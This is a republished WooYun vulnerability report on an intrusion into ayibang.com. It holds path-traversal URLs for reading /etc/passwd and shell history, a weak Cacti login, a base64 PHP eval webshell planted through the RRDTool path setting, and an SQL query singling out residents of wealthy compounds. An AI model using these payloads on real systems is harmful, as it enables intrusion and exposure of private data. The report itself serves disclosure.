记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

渗透测试阿姨帮(大量雇主阿姨数据泄漏)

2015-08-08 08:35

任意文件读取:

code 区域
http://ayibang.com/appointment/detail?city=%E5%8C%97%E4%BA%AC&keyword=../../../../../../../../../../etc/passwd%00.jpg





漏洞证明:

当前用户www,可读取.bash_history

code 区域
/appointment/detail?city=%E5%8C%97%E4%BA%AC&keyword=../../../../../../../../../../home/www/.bash_history%00.jpg



code 区域
/data/webserver/nginx/conf/vhost/admin.ay.com.conf

root /data/htdocs/admin.ay.com/public

listen 8306;

server_name admin.ay.com admin0803.ayibang.com;



修改hosts,访问后台,这后台的验证码不过期:

code 区域

mask 区域
*****9.8*****

admin.ay.com



admin.ay.com.png



简单翻看,可找到cacti,admin 123456弱口令:

code 区域

mask 区域
1.http://**.**.**

/cacti/index.php



ayibang.cacti.png



进入cacti,在settings -> paths中修改配置getshell:

code 区域
Log file path: /data/htdocs/mail/blog/phpinfo.php 

RRDTool Binary Path: echo PD9waHAgQGV2YWwoJF9QT1NUWycxMjM0NTYnXSk7Pz5vaw==|base64 -d > /data/htdocs/mail/blog/phpinfo.php



稍等片刻,可用菜刀连接。

ayibang.getshell.png



翻shell脚本找到了root密码。。。

查表,得到employer数据

mask 区域
*****7*****

万。 admin表用户

mask 区域
*****4*****

个。阿姨数据

mask 区域
*****7*****

个。

解密一位管理员,进入后台:

mask 区域
*****  wx*****



ayibang.manage.png



在后台可以查看优惠券,管理APP等。

我没有拖库,攻击者可以查一些自己感兴趣的人出来:

code 区域
SELECT * FROM employer where (address like '%星河湾%' or address like '%棕榈泉小区%' or address like '%紫玉山庄%') and city='北京' LIMIT 0, 30



ayibang.query.png



修复方案:

过滤,限定不可跨父目录

增强安全

知识来源: www.wooyun.org/bugs/wooyun-2015-0120541

阅读:98868 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“渗透测试阿姨帮(大量雇主阿姨数据泄漏)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云